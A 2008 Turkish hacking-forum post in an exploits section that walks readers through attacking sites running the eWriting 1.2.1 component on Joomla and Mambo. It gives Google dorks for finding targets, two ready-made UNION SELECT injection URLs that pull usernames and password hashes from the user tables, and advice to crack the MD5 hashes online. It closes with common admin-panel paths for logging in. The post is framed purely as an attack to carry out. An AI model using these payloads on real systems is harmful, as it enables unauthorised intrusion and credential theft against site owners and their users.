Would you like to react to this message? Create an account in a few clicks or log in to continue.


 
AnasayfaAnasayfa  Latest imagesLatest images  Kayıt OlKayıt Ol  Giriş yapGiriş yap  

 

 Mambo ve Joomla'da Remote SQL Injection Açıkları | Güncel

Aşağa gitmek 
YazarMesaj
hacked
MASTER
MASTER
hacked


Mesaj Sayısı : 199
Kayıt tarihi : 08/03/08

Mambo ve Joomla'da Remote SQL Injection Açıkları | Güncel Empty
MesajKonu: Mambo ve Joomla'da Remote SQL Injection Açıkları | Güncel   Mambo ve Joomla'da Remote SQL Injection Açıkları | Güncel EmptyPtsi Mart 10, 2008 11:47 pm

Bugün Sizlere eWriting 1.2.1 - SQL injection Acigindan bahsedecegim..


Google Arama Kodumuz ;
1) "Powered by eWriting 1.2.1
2) allinurl:"com_ewriting"

Ilk defa Böyle Bir Konu Aciyorum..
Aciklari olan Siteler ; Joomla ve Mambo

Bu Yüzden Iki SQL Injection'umuz Var ;

1)Joomla'daki Sitelerin Acigina Varmak Icin ;
HEDEFSITE.COM/index.php?option=com_ewriting&Itemid=9999&func=sel ectcat&cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,passwo rd),4,5,6,7,8,9,10+FROM+jos_users--
================================================== ================================================== ==================================================
2)Mambo'daki Sitelerin Acigina Varmak Icin ;
HEDEFSITE.COM/index.php?option=com_ewriting&Itemid=9999&func=sel ectcat&cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,passwo rd),4,5,6,7,8,9,10+FROM+mos_users--

Aciklar Etkilidir..
Joomla'da Sonuca varamassaniz Mambo'da deneyiniz (:

Cikan Hashi >> WWW.MD5SEARCH.ORG >> SELECT ALL >> MD5'i GIR >> OK
================================================== ==============
Burda Arayabilirsiniz

Site Admin Panelleri
www.site.com/admin
www.site.com/admin.php
www.site.com/administrator
www.site.com/administrator.php

Not ;Acik Bana Ait degildir ! Anlatimi Tamamen Bana Aittir, ve izinsiz olarak Baska sitelerde Yayinlanmasi KESINLIKLE Yasaktir!


Saygilarimi Sunarim...
Sayfa başına dön Aşağa gitmek
 
Mambo ve Joomla'da Remote SQL Injection Açıkları | Güncel
Sayfa başına dön 
1 sayfadaki 1 sayfası
 Similar topics
-
» exploit PHP-FUSION Arcade Module (cid) Remote SQL Injection
» PowerClan 1.14 - SQL Injection
» Vbulletin 3.6.5 Sql Injection ! [misc.php]

Bu forumun müsaadesi var:Bu forumdaki mesajlara cevap veremezsiniz
 :: Exploitler-
Buraya geçin: